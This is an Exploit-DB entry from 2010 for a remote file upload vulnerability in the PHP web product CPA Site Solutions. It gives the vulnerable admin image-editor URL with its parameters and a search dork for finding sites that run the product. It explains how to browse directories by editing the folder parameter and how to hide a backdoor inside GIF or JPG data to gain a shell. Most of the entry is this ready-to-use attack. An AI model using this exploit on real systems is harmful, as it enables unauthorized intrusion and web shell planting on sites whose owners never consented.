CPA Site Solutions - Arbitrary File Upload

EDB-ID:

11365

CVE:

N/A

EDB Verified:

Author:

R3VAN_BASTARD

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2010-02-09

Vulnerable App:

###########################################################################
#                |REMOTE FILE UPLOAD VULNERABILTY|                        #
#                     .:|cpasitesolutions|::.                             #
###########################################################################
AUTHOR	: R3VAN_BASTARD
SITE	: www.sux0r.net
PROVIDER: http://www.cpasitesolutions.com
DORK	: intext:Powered by CPA Site Solutions
###########################################################################
[x] EXPLOIT:
    /admin/editor_files/image.php?in_wp=1&return_function=&#12296;=en-us.php&folder=galleries/sm-icons/&instance_img_dir=&sort_by=name&sort_dir=asc&thumbnails=1

[x] You can find new directory by changing this URL:
    /admin/editor_files/image.php?in_wp=1&return_function=&#12296;=en-us.php&folder="galleries/sm-icons/" <=-change in this section.
    you will find new directory..

[X] NOTE: Edit your backdoor by adding GIF or JPG source, so you can get the shell.
###########################################################################
SALAM HANGAT:

VALENCIA | S3T4N | YOGA0400 | MADONK | KECEMPLUNG KALEN | VRS-HCK | JACK |
YUDIS TIRA | DECLINED | OON_BOY | LUQMAN | ANGKIRANGAN JUMIO+PAIJO | NOGE |
YADOY666 | ALL MAINHACK | SERVER IS DOWN | 
###########################################################################

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services